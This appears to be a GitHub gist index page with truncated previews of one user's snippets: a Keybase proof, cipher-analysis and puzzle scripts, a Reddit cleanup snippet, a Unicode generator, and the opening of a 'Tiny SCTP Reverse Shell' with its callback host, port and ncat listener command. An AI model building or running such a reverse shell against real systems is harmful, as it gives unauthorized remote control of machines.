I hereby claim:
- I am hyperreality on github.
- I am hyperreality (https://keybase.io/hyperreality) on keybase.
- I have a public key ASAZvP0Suk6P4hb_f_Vh8tSwTMkIzD6gJAwCj6lVjuk7fAo
To claim this, I am signing this object:
Albigensian.com | |
Americanizations.com | |
Andrianampoinimerina.com | |
Anglicanisms.com | |
Araucanian.com | |
Brahmanisms.com | |
Chanukahs.com | |
Chayefsky.com | |
Churriguera.com | |
Confucianisms.com |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/python3 | |
from collections import Counter | |
import operator | |
import string | |
def ic(ctext): | |
num = 0.0 | |
den = 0.0 | |
for val in Counter(ctext).values(): |
#!/usr/bin/env node | |
const opn = require('opn'); | |
var path = require('path'); | |
var argv = require('minimist')(process.argv.slice(2)); | |
if (!argv._.length) { | |
console.log('Usage: so-debug FILE.js [-g search Google] [-b specify which browser to use]'); | |
} | |
else { |
python -c "import readline,subprocess as s;p=s.Popen('mira',shell=True,stdin=s.PIPE);[p.stdin.write(raw_input()+'\n') for _ in iter(int,1)]" |
#!/usr/bin/env python3 | |
# | |
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765 | |
# Connect with `ncat --sctp -lvp 1234` | |
import os, socket, subprocess | |
RHOST = '127.0.0.1' | |
RPORT = 1234 |
// Problem 5 | |
// Write a program that outputs all possibilities to put + or - or nothing between the numbers 1, 2, ..., 9 (in this order) such that the result is always 100. For example: 1 + 2 + 34 – 5 + 67 – 8 + 9 = 100. | |
// http://www.shiftedup.com/2015/05/07/five-programming-problems-every-software-engineer-should-be-able-to-solve-in-less-than-1-hour | |
var nums = [1, 2, 3, 4, 5, 6, 7, 8, 9], | |
symbols = ['+', '-', ' '], | |
perms = []; | |
function kLengthPermutations(permArr, k, prefix) { |
// To remove the inane default subreddits automatically | |
// Go to https://www.reddit.com/subreddits/ and paste the following code into your browser console | |
function clickSubredditButtons(buttons) { | |
var i = buttons.length; | |
setTimeout(function() { | |
buttons[0].click() | |
if (--i) clickSubredditButtons(buttons.slice(1)); | |
}, 500) | |
} |
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
import random | |
code_points = { | |
'english': (32, 126), | |
'burmese': (1024, 1279), | |
'arabic': (1536, 1791), | |
'canadian_aboriginal': (5120, 5759), |